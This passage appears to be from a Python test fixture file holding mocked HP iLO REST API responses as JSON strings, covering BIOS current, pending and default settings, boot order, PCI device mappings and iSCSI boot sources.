"NicBoot3": "Disabled",
"NicBoot4": "Disabled",
"NicBoot5": "Disabled",
"NicBoot6": "Disabled",
"NicBoot7": "Disabled",
"NicBoot8": "Disabled",
"NmiDebugButton": "Enabled",
"NodeInterleaving": "Disabled",
"NumaGroupSizeOpt": "Clustered",
"NvDimmNMemFunctionality": "Enabled",
"OldAdminPassword": null,
"OldPowerOnPassword": null,
"PciBusPadding": "Enabled",
"PostF1Prompt": "Delayed20Sec",
"PowerButton": "Enabled",
"PowerOnDelay": "None",
"PowerOnLogo": "Enabled",
"PowerOnPassword": null,
"PowerProfile": "BalancedPowerPerf",
"PowerRegulator": "DynamicPowerSavings",
"PreBootNetwork": "Auto",
"ProcAes": "Enabled",
"ProcCoreDisable": 0,
"ProcNoExecute": "Enabled",
"ProcVirtualization": "Enabled",
"ProcX2Apic": "Enabled",
"ProductId": "727021-B21",
"QpiBandwidthOpt": "Balanced",
"QpiSnoopConfig": "Standard",
"RemovableFlashBootSeq": "ExternalKeysFirst",
"RestoreDefaults": "No",
"RestoreManufacturingDefaults": "No",
"RomSelection": "CurrentRom",
"SataSecureErase": "Disabled",
"SaveUserDefaults": "No",
"SecureBootStatus": "Disabled",
"SerialConsoleBaudRate": "115200",
"SerialConsoleEmulation": "Vt100Plus",
"SerialConsolePort": "Auto",
"SerialNumber": "SGH449WNL3",
"ServerAssetTag": "",
"ServerName": "",
"ServerOtherInfo": "",
"ServerPrimaryOs": "",
"ServiceEmail": "",
"ServiceName": "",
"ServiceOtherInfo": "",
"ServicePhone": "",
"SettingsResult":
{
"ETag": "5E0136E3",
"Messages":
[
{
"MessageArgs":
[
"Disable",
"TpmOperation"
],
"MessageID": "Base.1.0:PropertyValueTypeError"
},
{
"MessageArgs":
[
],
"MessageID": "Base.1.0:Success"
}
],
"Time": "2015-03-09T17:50:09+00:00"
},
"Sriov": "Enabled",
"ThermalConfig": "OptimalCooling",
"ThermalShutdown": "Enabled",
"TimeFormat": "Utc",
"TimeZone": "Unspecified",
"Tpm2Operation": "NoAction",
"Tpm2Visibility": "Visible",
"TpmBinding": "Disabled",
"TpmState": "NotPresent",
"TpmType": "NoTpm",
"TpmUefiOpromMeasuring": "Enabled",
"TpmVisibility": "Visible",
"Type": "HpBios.1.1.0",
"UefiPxeBoot": "Auto",
"UefiShellBootOrder": "Disabled",
"UefiShellStartup": "Disabled",
"UefiShellStartupLocation": "Auto",
"UefiShellStartupUrl": "",
"UrlBootFile": "",
"Usb3Mode": "Auto",
"UsbBoot": "Enabled",
"UsbControl": "UsbEnabled",
"UtilityLang": "English",
"VideoOptions": "BothVideoEnabled",
"VirtualInstallDisk": "Disabled",
"VirtualSerialPort": "Com1Irq4",
"WakeOnLan": "Disabled",
"links":
{
"BaseConfigs":
{
"href": "/rest/v1/systems/1/bios/BaseConfigs"
},
"Boot":
{
"href": "/rest/v1/systems/1/bios/Boot"
},
"Mappings":
{
"href": "/rest/v1/systems/1/bios/Mappings"
},
"Settings":
{
"href": "/rest/v1/systems/1/bios/Settings"
},
"iScsi":
{
"href": "/rest/v1/systems/1/bios/iScsi"
},
"self":
{
"href": "/rest/v1/systems/1/bios"
}
}
}
"""
GET_BIOS_PENDING_SETTINGS = """
{
"AcpiRootBridgePxm": "Enabled",
"AcpiSlit": "Enabled",
"AdjSecPrefetch": "Enabled",
"AdminEmail": "",
"AdminName": "",
"AdminOtherInfo": "",
"AdminPassword": null,
"AdminPhone": "",
"AdvancedMemProtection": "AdvancedEcc",
"AsrStatus": "Enabled",
"AsrTimeoutMinutes": "10",
"AssetTagProtection": "Unlocked",
"AutoPowerOn": "RestoreLastState",
"BootMode": "Uefi",
"BootOrderPolicy": "RetryIndefinitely",
"ChannelInterleaving": "Enabled",
"CollabPowerControl": "Enabled",
"ConsistentDevNaming": "LomsOnly",
"CustomPostMessage": "",
"DaylightSavingsTime": "Disabled",
"DcuIpPrefetcher": "Enabled",
"DcuStreamPrefetcher": "Enabled",
"Description": "This is the Platform/BIOS Configuration (RBSU) \
Pending Settings",
"Dhcpv4": "Enabled",
"DynamicPowerCapping": "Auto",
"DynamicPowerResponse": "Fast",
"EmbNicEnable": "Enabled",
"EmbSata1Enable": "Enabled",
"EmbSata2Enable": "Enabled",
"EmbVideoConnection": "Auto",
"EmbeddedDiagnostics": "Enabled",
"EmbeddedDiagsMode": "Auto",
"EmbeddedSata": "Ahci",
"EmbeddedSerialPort": "Com1Irq4",
"EmbeddedUefiShell": "Enabled",
"EmbeddedUserPartition": "Disabled",
"EmsConsole": "Disabled",
"EnergyPerfBias": "BalancedPerf",
"EraseUserDefaults": "No",
"ExtendedAmbientTemp": "Disabled",
"ExtendedMemTest": "Disabled",
"F11BootMenu": "Enabled",
"FCScanPolicy": "CardConfig",
"FanFailPolicy": "Shutdown",
"FanInstallReq": "EnableMessaging",
"HwPrefetcher": "Enabled",
"IntelDmiLinkFreq": "Auto",
"IntelNicDmaChannels": "Enabled",
"IntelPerfMonitoring": "Disabled",
"IntelProcVtd": "Enabled",
"IntelligentProvisioning": "Enabled",
"InternalSDCardSlot": "Enabled",
"IoNonPostedPrefetching": "Enabled",
"Ipv4Address": "0.0.0.0",
"Ipv4Gateway": "0.0.0.0",
"Ipv4PrimaryDNS": "0.0.0.0",
"Ipv4SecondaryDNS": "0.0.0.0",
"Ipv4SubnetMask": "0.0.0.0",
"Ipv6Duid": "Auto",
"MaxMemBusFreqMHz": "Auto",
"MaxPcieSpeed": "MaxSupported",
"MemFastTraining": "Enabled",
"MinProcIdlePkgState": "C6Retention",
"MinProcIdlePower": "C6",
"MixedPowerSupplyReporting": "Enabled",
"Modified": "2018-06-25T22:36:55+00:00",
"Name": "BIOS Pending Settings",
"NetworkBootRetry": "Enabled",
"NicBoot1": "NetworkBoot",
"NicBoot2": "Disabled",
"NicBoot3": "Disabled",
"NicBoot4": "Disabled",
"NmiDebugButton": "Enabled",
"NodeInterleaving": "Disabled",
"NumaGroupSizeOpt": "Clustered",
"OldAdminPassword": null,
"OldPowerOnPassword": null,
"PciBusPadding": "Enabled",
"PciSlot1Enable": "Enabled",
"PcieExpressEcrcSupport": "Disabled",
"PostF1Prompt": "Delayed20Sec",
"PowerButton": "Enabled",
"PowerOnDelay": "None",
"PowerOnLogo": "Enabled",
"PowerOnPassword": null,
"PowerProfile": "BalancedPowerPerf",
"PowerRegulator": "StaticHighPerf",
"PreBootNetwork": "Auto",
"ProcAes": "Enabled",
"ProcCoreDisable": 0,
"ProcNoExecute": "Enabled",
"ProcVirtualization": "Enabled",
"ProcX2Apic": "Enabled",
"ProductId": "719061-B21",
"QpiSnoopConfig": "Standard",
"RedundantPowerSupply": "BalancedMode",
"RemovableFlashBootSeq": "ExternalKeysFirst",
"RestoreDefaults": "No",
"RestoreManufacturingDefaults": "No",
"RomSelection": "CurrentRom",
"SataSecureErase": "Disabled",
"SaveUserDefaults": "No",
"SecureBootStatus": "Disabled",
"SerialConsoleBaudRate": "115200",
"SerialConsoleEmulation": "Vt100Plus",
"SerialConsolePort": "Auto",
"SerialNumber": "SGH449WW5B",
"ServerAssetTag": "",
"ServerName": "",
"ServerOtherInfo": "",
"ServerPrimaryOs": "",
"ServiceEmail": "",
"ServiceName": "",
"ServiceOtherInfo": "",
"ServicePhone": "",
"Slot1StorageBoot": "AllTargets",
"Sriov": "Enabled",
"ThermalConfig": "OptimalCooling",
"ThermalShutdown": "Enabled",
"TimeFormat": "Utc",
"TimeZone": "UtcP530",
"TpmState": "NotPresent",
"TpmType": "NoTpm",
"Type": "HpBios.1.2.0",
"UefiOptimizedBoot": "Enabled",
"UefiPxeBoot": "Auto",
"UefiShellBootOrder": "Disabled",
"UefiShellStartup": "Disabled",
"UefiShellStartupLocation": "Auto",
"UefiShellStartupUrl": "",
"UrlBootFile": "",
"Usb3Mode": "Auto",
"UsbBoot": "Enabled",
"UsbControl": "UsbEnabled",
"UtilityLang": "English",
"VirtualInstallDisk": "Disabled",
"VirtualSerialPort": "Com2Irq3",
"VlanControl": "Disabled",
"VlanId": 0,
"VlanPriority": 0,
"WakeOnLan": "Enabled",
"links":
{
"self":
{
"href": "/rest/v1/systems/1/bios/Settings"
}
}
}
"""
GET_BIOS_BOOT = """
{
"AttributeRegistry": "HpBiosAttributeRegistryP89.1.1.00",
"BootSources": [
{
"BootString": "Slot 1 : Smart Array P840 Controller - 279.37 GiB,\
RAID 0 Logical Drive(Target:0, Lun:0)",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)",
"StructuredBootString": "HD.Slot.1.1",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/Scsi\
(0x0,0x0)"
},
{
"BootString": "Slot 1 : Smart Array P840 Controller - 279.37 GiB,\
RAID 0 Logical Drive(Target:0, Lun:1)",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)",
"StructuredBootString": "HD.Slot.1.2",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/Scsi\
(0x0,0x1)"
},
{
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 4-port\
331i Adapter - NIC (PXE IPv4) ",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"StructuredBootString": "NIC.LOM.1.1.IPv4",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)/MAC\
(C4346BB7EF30,0x0)/IPv4(0.0.0.0)"
},
{
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 2-port\
361i Adapter - NIC (iSCSI IPv4) ",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x3)/Pci(0x0,0x0)",
"StructuredBootString": "NIC.LOM.1.1.iSCSI",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x3)/Pci(0x0,0x0)/MAC\
(C4346BB7EF30,0x1)/IPv4(0.0.0.0)/iSCSI(iqn.2016-07.org.de\
:storage,0x1,0x0,None,None,None,TCP)"
},
{
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 4-port\
331i Adapter - NIC (PXE IPv6) ",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"StructuredBootString": "NIC.LOM.1.1.IPv6",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)/MAC\
(C4346BB7EF30,0x0)/IPv6(0000:0000:0000:0000:0000:0000:0000:0000)"
},
{
"BootString": "Generic USB Boot",
"CorrelatableID": "UsbClass(0xFFFF,0xFFFF,0xFF,0xFF,0xFF)",
"StructuredBootString": "Generic.USB.1.1",
"UEFIDevicePath": "UsbClass(0xFFFF,0xFFFF,0xFF,0xFF,0xFF)"
},
{
"BootString": "iLO Virtual USB 2 : HP iLO Virtual USB CD/DVD ROM",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1D,0x0)/USB(0x0,0x0)/USB\
(0x0,0x0)",
"StructuredBootString": "CD.Virtual.2.1",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1D,0x0)/USB(0x0,0x0)/USB\
(0x0,0x0)"
}
],
"DefaultBootOrder": [
"Floppy",
"Cd",
"Usb",
"EmbeddedStorage",
"PcieSlotStorage",
"EmbeddedFlexLOM",
"PcieSlotNic",
"UefiShell"
],
"Description": "This is the Server Boot Order Current Settings",
"DesiredBootDevices": [
{
"CorrelatableID": "",
"Lun": "",
"Wwn": "",
"iScsiTargetName": ""
},
{
"CorrelatableID": "",
"Lun": "",
"Wwn": "",
"iScsiTargetName": ""
}
],
"Modified": "2015-05-26T23:38:24+00:00",
"Name": "Boot Order Current Settings",
"PersistentBootConfigOrder": [
"HD.Slot.1.1",
"HD.Slot.1.2",
"NIC.LOM.1.1.iSCSI",
"NIC.LOM.1.1.IPv4",
"NIC.LOM.1.1.IPv6",
"Generic.USB.1.1",
"CD.Virtual.2.1"
],
"SettingsResult": {
"ETag": "0DEA61A1609C51EED0628E3B0BC633DD",
"Messages": [
{
"MessageArgs": [
"PersistentBootConfigOrder[0"
],
"MessageID": "Base.1.0:PropertyValueNotInList"
},
{
"MessageArgs": [],
"MessageID": "Base.1.0:Success"
}
],
"Time": "2015-05-14T02:38:40+00:00"
},
"Type": "HpServerBootSettings.1.2.0",
"links": {
"BaseConfigs": {
"href": "/rest/v1/systems/1/bios/Boot/BaseConfigs"
},
"Settings": {
"href": "/rest/v1/systems/1/bios/Boot/Settings"
},
"self": {
"href": "/rest/v1/systems/1/bios/Boot"
}
}
}
"""
GET_BIOS_MAPPINGS_WITHOUT_NIC = """
{
"Registry": "HpBiosAttributeRegistryP89.1.1.00",
"BiosPciSettingsMappings": [
{
"Associations": [
"EmbSata1Enable"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1F,0x2)",
"Instance": 1,
"Subinstances": []
},
{
"Associations": [
"EmbNicEnable",
{
"PreBootNetwork": "EmbNic"
}
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"Instance": 3,
"Subinstances": []
}
]
}
"""
GET_BIOS_MAPPINGS = """
{
"Registry": "HpBiosAttributeRegistryP89.1.1.00",
"BiosPciSettingsMappings": [
{
"Associations": [
"EmbSata1Enable"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1F,0x2)",
"Instance": 1,
"Subinstances": []
},
{
"Associations": [
"EmbSata2Enable"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x11,0x4)",
"Instance": 2,
"Subinstances": []
},
{
"Associations": [
"EmbNicEnable",
{
"PreBootNetwork": "EmbNic"
}
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"Instance": 3,
"Subinstances": [
{
"Associations": [
"NicBoot1"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"Subinstance": 1
},
{
"Associations": [
"NicBoot2"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x1)",
"Subinstance": 2
},
{
"Associations": [
"NicBoot3"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x2)",
"Subinstance": 3
},
{
"Associations": [
"NicBoot4"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x3)",
"Subinstance": 4
}
]
},
{
"Associations": [
"EmbSasEnable"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1,0x0)/Pci(0x0,0x0)",
"Instance": 4,
"Subinstances": []
},
{
"Associations": [
"FlexLom1Enable",
{
"PreBootNetwork": "FlexLom1"
}
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x2)/Pci(0x0,0x0)",
"Instance": 5,
"Subinstances": []
},
{
"Associations": [
"PciSlot1Enable"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)",
"Instance": 6,
"Subinstances": []
},
{
"Associations": [
"PciSlot3Enable"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x3,0x0)/Pci(0x0,0x0)",
"Instance": 7,
"Subinstances": []
},
{
"Associations": [
"PciSlot2Enable"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x3,0x2)/Pci(0x0,0x0)",
"Instance": 8,
"Subinstances": []
},
{
"Associations": [
"Slot1StorageBoot"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/\
Scsi(0x0,0x0)",
"Instance": 9,
"Subinstances": []
},
{
"Associations": [
"Slot1StorageBoot"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/\
Scsi(0x0,0x1)",
"Instance": 10,
"Subinstances": []
},
{
"Associations": [
"Slot1StorageBoot"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/\
Scsi(0x0,0x0)/HD(1,MBR,0x000677A4,0x800,0x2800)",
"Instance": 11,
"Subinstances": []
},
{
"Associations": [
"Slot1StorageBoot"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/\
Scsi(0x0,0x0)/HD(2,MBR,0x000677A4,0x3000,0x800)",
"Instance": 12,
"Subinstances": []
},
{
"Associations": [
"Slot1StorageBoot"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/\
Scsi(0x0,0x0)/HD(3,MBR,0x000677A4,0x3800,0x6400000)",
"Instance": 13,
"Subinstances": []
}
],
"Modified": "2015-05-22T06:48:46+00:00",
"Name": "Bios Setting Mapping to Devices",
"Type": "HpBiosMapping.1.2.0",
"links": {
"self": {
"href": "/rest/v1/systems/1/bios/Mappings"
}
}
}
"""
GET_BASE_CONFIG = """
{
"BaseConfigs":
[
{
"default":
{
"AcpiRootBridgePxm": "Enabled",
"AcpiSlit": "Enabled",
"AdjSecPrefetch": "Enabled",
"AdminEmail": "",
"AdminName": "",
"AdminOtherInfo": "",
"AdminPassword": "",
"AdminPhone": "",
"AdvancedMemProtection": "AdvancedEcc",
"AsrStatus": "Enabled",
"AsrTimeoutMinutes": "10",
"AssetTagProtection": "Unlocked",
"AutoPowerOn": "RestoreLastState",
"BootMode": "Uefi",
"BootOrderPolicy": "RetryIndefinitely",
"ChannelInterleaving": "Enabled",
"CollabPowerControl": "Enabled",
"ConsistentDevNaming": "LomsOnly",
"CustomPostMessage": "",
"DcuIpPrefetcher": "Enabled",
"DcuStreamPrefetcher": "Enabled",
"Description": "BIOS System Defaults",
"Dhcpv4": "Enabled",
"DynamicPowerCapping": "Auto",
"DynamicPowerResponse": "Fast",
"EmbNicEnable": "Enabled",
"EmbSas1Boot": "AllTargets",
"EmbSata1Enable": "Enabled",
"EmbSata2Enable": "Enabled",
"EmbVideoConnection": "Auto",
"EmbeddedDiagnostics": "Enabled",
"EmbeddedDiagsMode": "Auto",
"EmbeddedSata": "Ahci",
"EmbeddedSerialPort": "Com1Irq4",
"EmbeddedUefiShell": "Enabled",
"EmbeddedUserPartition": "Disabled",
"EmsConsole": "Disabled",
"EnergyPerfBias": "BalancedPerf",
"EraseUserDefaults": "No",
"ExtendedAmbientTemp": "Disabled",
"ExtendedMemTest": "Disabled",
"F11BootMenu": "Enabled",
"FCScanPolicy": "AllTargets",
"FanFailPolicy": "Shutdown",
"FanInstallReq": "EnableMessaging",
"HwPrefetcher": "Enabled",
"IntelDmiLinkFreq": "Auto",
"IntelNicDmaChannels": "Enabled",
"IntelPerfMonitoring": "Disabled",
"IntelProcVtd": "Enabled",
"IntelQpiFreq": "Auto",
"IntelQpiLinkEn": "Auto",
"IntelQpiPowerManagement": "Enabled",
"IntelTxt": "Disabled",
"IntelligentProvisioning": "Enabled",
"InternalSDCardSlot": "Enabled",
"IoNonPostedPrefetching": "Enabled",
"Ipv4Address": "0.0.0.0",
"Ipv4Gateway": "0.0.0.0",
"Ipv4PrimaryDNS": "0.0.0.0",
"Ipv4SecondaryDNS": "0.0.0.0",
"Ipv4SubnetMask": "0.0.0.0",
"MaxMemBusFreqMHz": "Auto",
"MaxPcieSpeed": "MaxSupported",
"MemFastTraining": "Enabled",
"MinProcIdlePkgState": "C6Retention",
"MinProcIdlePower": "C6",
"MixedPowerSupplyReporting": "Enabled",
"NetworkBootRetry": "Enabled",
"NicBoot1": "NetworkBoot",
"NicBoot2": "Disabled",
"NicBoot3": "Disabled",
"NicBoot4": "Disabled",
"NmiDebugButton": "Enabled",
"NodeInterleaving": "Disabled",
"NumaGroupSizeOpt": "Clustered",
"OldAdminPassword": "",
"OldPowerOnPassword": "",
"PciBusPadding": "Enabled",
"PciSlot1Enable": "Enabled",
"PostF1Prompt": "Delayed20Sec",
"PowerButton": "Enabled",
"PowerOnDelay": "None",
"PowerOnLogo": "Enabled",
"PowerOnPassword": "",
"PowerProfile": "BalancedPowerPerf",
"PowerRegulator": "DynamicPowerSavings",
"PreBootNetwork": "Auto",
"ProcAes": "Enabled",
"ProcCoreDisable": 0,
"ProcNoExecute": "Enabled",
"ProcVirtualization": "Enabled",
"ProcX2Apic": "Enabled",
"QpiBandwidthOpt": "Balanced",
"QpiSnoopConfig": "Standard",
"RedundantPowerSupply": "BalancedMode",
"RemovableFlashBootSeq": "ExternalKeysFirst",
"RestoreDefaults": "No",
"RestoreManufacturingDefaults": "No",
"SataSecureErase": "Disabled",
"SaveUserDefaults": "No",
"SecureBoot": "Disabled",
"SecureBootStatus": "Disabled",
"SerialConsoleBaudRate": "115200",
"SerialConsoleEmulation": "Vt100Plus",
"SerialConsolePort": "Auto",
"ServerAssetTag": "",
"ServerName": "",
"ServerOtherInfo": "",
"ServerPrimaryOs": "",
"ServiceEmail": "",
"ServiceName": "",
"ServiceOtherInfo": "",
"ServicePhone": "",
"Slot1StorageBoot": "AllTargets",
"Slot2StorageBoot": "AllTargets",
"Slot3StorageBoot": "AllTargets",
"Slot4StorageBoot": "AllTargets",
"Slot5StorageBoot": "AllTargets",
"Slot6StorageBoot": "AllTargets",
"Sriov": "Enabled",
"TcmOperation": "Disable",
"TcmVisibility": "Visible",
"ThermalConfig": "OptimalCooling",
"ThermalShutdown": "Enabled",
"TimeFormat": "Utc",
"TimeZone": "UtcM7",
"Tpm2Operation": "NoAction",
"Tpm2Ppi": "Disabled",
"Tpm2Visibility": "Visible",
"TpmBinding": "Disabled",
"TpmOperation": "Disable",
"TpmState": "NotPresent",
"TpmType": "NoTpm",
"TpmUefiOpromMeasuring": "Enabled",
"TpmVisibility": "Visible",
"UefiOptimizedBoot": "Enabled",
"UefiPxeBoot": "Auto",
"UefiShellBootOrder": "Disabled",
"UefiShellStartup": "Disabled",
"UefiShellStartupLocation": "Auto",
"UefiShellStartupUrl": "",
"UrlBootFile": "",
"Usb3Mode": "Auto",
"UsbBoot": "Enabled",
"UsbControl": "UsbEnabled",
"UtilityLang": "English",
"VideoOptions": "BothVideoEnabled",
"VirtualInstallDisk": "Disabled",
"VirtualSerialPort": "Com2Irq3",
"VlanControl": "Disabled",
"VlanId": 0,
"VlanPriority": 0,
"WakeOnLan": "Enabled"
}
}
],
"Capabilities":
{
"BaseConfig": true,
"BaseConfigs": false
},
"Modified": "2015-03-26T00:05:15+00:00",
"Name": "BIOS Default Settings",
"Type": "HpBaseConfigs.0.10.0",
"links":
{
"self":
{
"href": "/rest/v1/systems/1/bios/BaseConfigs"
}
}
}
"""
GET_DEFAULT_CONFIG = """
{
"AcpiRootBridgePxm": "Enabled",
"AcpiSlit": "Enabled",
"AdjSecPrefetch": "Enabled",
"AdminEmail": "",
"AdminName": "",
"AdminOtherInfo": "",
"AdminPassword": "",
"AdminPhone": "",
"AdvancedMemProtection": "AdvancedEcc",
"AsrStatus": "Enabled",
"AsrTimeoutMinutes": "10",
"AssetTagProtection": "Unlocked",
"AutoPowerOn": "RestoreLastState",
"BootMode": "Uefi",
"BootOrderPolicy": "RetryIndefinitely",
"ChannelInterleaving": "Enabled",
"CollabPowerControl": "Enabled",
"ConsistentDevNaming": "LomsOnly",
"CustomPostMessage": "",
"DcuIpPrefetcher": "Enabled",
"DcuStreamPrefetcher": "Enabled",
"Description": "BIOS System Defaults",
"Dhcpv4": "Enabled",
"DynamicPowerCapping": "Auto",
"DynamicPowerResponse": "Fast",
"EmbNicEnable": "Enabled",
"EmbSas1Boot": "AllTargets",
"EmbSata1Enable": "Enabled",
"EmbSata2Enable": "Enabled",
"EmbVideoConnection": "Auto",
"EmbeddedDiagnostics": "Enabled",
"EmbeddedDiagsMode": "Auto",
"EmbeddedSata": "Ahci",
"EmbeddedSerialPort": "Com1Irq4",
"EmbeddedUefiShell": "Enabled",
"EmbeddedUserPartition": "Disabled",
"EmsConsole": "Disabled",
"EnergyPerfBias": "BalancedPerf",
"EraseUserDefaults": "No",
"ExtendedAmbientTemp": "Disabled",
"ExtendedMemTest": "Disabled",
"F11BootMenu": "Enabled",
"FCScanPolicy": "AllTargets",
"FanFailPolicy": "Shutdown",
"FanInstallReq": "EnableMessaging",
"HwPrefetcher": "Enabled",
"IntelDmiLinkFreq": "Auto",
"IntelNicDmaChannels": "Enabled",
"IntelPerfMonitoring": "Disabled",
"IntelProcVtd": "Enabled",
"IntelQpiFreq": "Auto",
"IntelQpiLinkEn": "Auto",
"IntelQpiPowerManagement": "Enabled",
"IntelTxt": "Disabled",
"IntelligentProvisioning": "Enabled",
"InternalSDCardSlot": "Enabled",
"IoNonPostedPrefetching": "Enabled",
"Ipv4Address": "0.0.0.0",
"Ipv4Gateway": "0.0.0.0",
"Ipv4PrimaryDNS": "0.0.0.0",
"Ipv4SecondaryDNS": "0.0.0.0",
"Ipv4SubnetMask": "0.0.0.0",
"MaxMemBusFreqMHz": "Auto",
"MaxPcieSpeed": "MaxSupported",
"MemFastTraining": "Enabled",
"MinProcIdlePkgState": "C6Retention",
"MinProcIdlePower": "C6",
"MixedPowerSupplyReporting": "Enabled",
"NetworkBootRetry": "Enabled",
"NicBoot1": "NetworkBoot",
"NicBoot2": "Disabled",
"NicBoot3": "Disabled",
"NicBoot4": "Disabled",
"NmiDebugButton": "Enabled",
"NodeInterleaving": "Disabled",
"NumaGroupSizeOpt": "Clustered",
"OldAdminPassword": "",
"OldPowerOnPassword": "",
"PciBusPadding": "Enabled",
"PciSlot1Enable": "Enabled",
"PostF1Prompt": "Delayed20Sec",
"PowerButton": "Enabled",
"PowerOnDelay": "None",
"PowerOnLogo": "Enabled",
"PowerOnPassword": "",
"PowerProfile": "BalancedPowerPerf",
"PowerRegulator": "DynamicPowerSavings",
"PreBootNetwork": "Auto",
"ProcAes": "Enabled",
"ProcCoreDisable": 0,
"ProcNoExecute": "Enabled",
"ProcVirtualization": "Enabled",
"ProcX2Apic": "Enabled",
"QpiBandwidthOpt": "Balanced",
"QpiSnoopConfig": "Standard",
"RedundantPowerSupply": "BalancedMode",
"RemovableFlashBootSeq": "ExternalKeysFirst",
"RestoreDefaults": "No",
"RestoreManufacturingDefaults": "No",
"SataSecureErase": "Disabled",
"SaveUserDefaults": "No",
"SecureBoot": "Disabled",
"SecureBootStatus": "Disabled",
"SerialConsoleBaudRate": "115200",
"SerialConsoleEmulation": "Vt100Plus",
"SerialConsolePort": "Auto",
"ServerAssetTag": "",
"ServerName": "",
"ServerOtherInfo": "",
"ServerPrimaryOs": "",
"ServiceEmail": "",
"ServiceName": "",
"ServiceOtherInfo": "",
"ServicePhone": "",
"Slot1StorageBoot": "AllTargets",
"Slot2StorageBoot": "AllTargets",
"Slot3StorageBoot": "AllTargets",
"Slot4StorageBoot": "AllTargets",
"Slot5StorageBoot": "AllTargets",
"Slot6StorageBoot": "AllTargets",
"Sriov": "Enabled",
"TcmOperation": "Disable",
"TcmVisibility": "Visible",
"ThermalConfig": "OptimalCooling",
"ThermalShutdown": "Enabled",
"TimeZone": "UtcM7",
"Tpm2Operation": "NoAction",
"Tpm2Ppi": "Disabled",
"Tpm2Visibility": "Visible",
"TpmBinding": "Disabled",
"TpmOperation": "Disable",
"TpmState": "NotPresent",
"TpmType": "NoTpm",
"TpmUefiOpromMeasuring": "Enabled",
"TpmVisibility": "Visible",
"UefiOptimizedBoot": "Enabled",
"UefiPxeBoot": "Auto",
"UefiShellBootOrder": "Disabled",
"UefiShellStartup": "Disabled",
"UefiShellStartupLocation": "Auto",
"UefiShellStartupUrl": "",
"UrlBootFile": "",
"Usb3Mode": "Auto",
"UsbBoot": "Enabled",
"UsbControl": "UsbEnabled",
"UtilityLang": "English",
"VideoOptions": "BothVideoEnabled",
"VirtualInstallDisk": "Disabled",
"VirtualSerialPort": "Com2Irq3",
"VlanControl": "Disabled",
"VlanId": 0,
"VlanPriority": 0,
"WakeOnLan": "Enabled"
}
"""
GET_ISCSI_PATCH = """
{
"iSCSIBootSources": [
{
"iSCSIBootAttemptInstance": 1,
"iSCSIBootAttemptName": "NicBoot1",
"iSCSIBootLUN": "1",
"iSCSINicSource": "NicBoot1",
"iSCSITargetIpAddress": "10.10.1.30",
"iSCSITargetName": "iqn.2011-07.com.example.server:test1",
"iSCSITargetTcpPort": 3260
},
{
"iSCSIBootAttemptInstance": 2,
"iSCSIBootAttemptName": "NicBoot2",
"iSCSIBootLUN": "1",
"iSCSINicSource": "NicBoot2",
"iSCSITargetIpAddress": "10.10.1.30",
"iSCSITargetName": "iqn.2011-07.com.example.server:test1",
"iSCSITargetTcpPort": 3260
},
{
"iSCSIBootAttemptInstance": 3,
"iSCSIBootAttemptName": "NicBoot3",
"iSCSIBootLUN": "1",
"iSCSINicSource": "NicBoot3",
"iSCSITargetIpAddress": "10.10.1.30",
"iSCSITargetName": "iqn.2011-07.com.example.server:test1",
"iSCSITargetTcpPort": 3260
},
{
"iSCSIBootAttemptInstance": 4,
"iSCSIBootAttemptName": "NicBoot4",
"iSCSIBootLUN": "1",
"iSCSINicSource": "NicBoot4",
"iSCSITargetIpAddress": "10.10.1.30",
"iSCSITargetName": "iqn.2011-07.com.example.server:test1",
"iSCSITargetTcpPort": 3260
}
]
}
"""
GET_ISCSI_SETTINGS = """
{
"AttributRegistry": "HpBiosAttributeRegistryP89.1.1.00",
"Description": "This is the Server iSCSI Software Initiator Current \
Settings",
"Modified": "2015-05-28T04:11:55+00:00",
"Name": "iSCSI Software Initiator Current Settings",
"SettingsResult": {
"ETag": "D43535CE",
"Messages": [
{
"MessageArgs": [
"iSCSITargetTcpport"
],
"MessageID": "Base.1.0:PropertyUnknown"
},
{
"MessageArgs": [],
"MessageID": "Base.1.0:Success"
}
],
"Time": "2015-05-28T04:11:55+00:00"
},
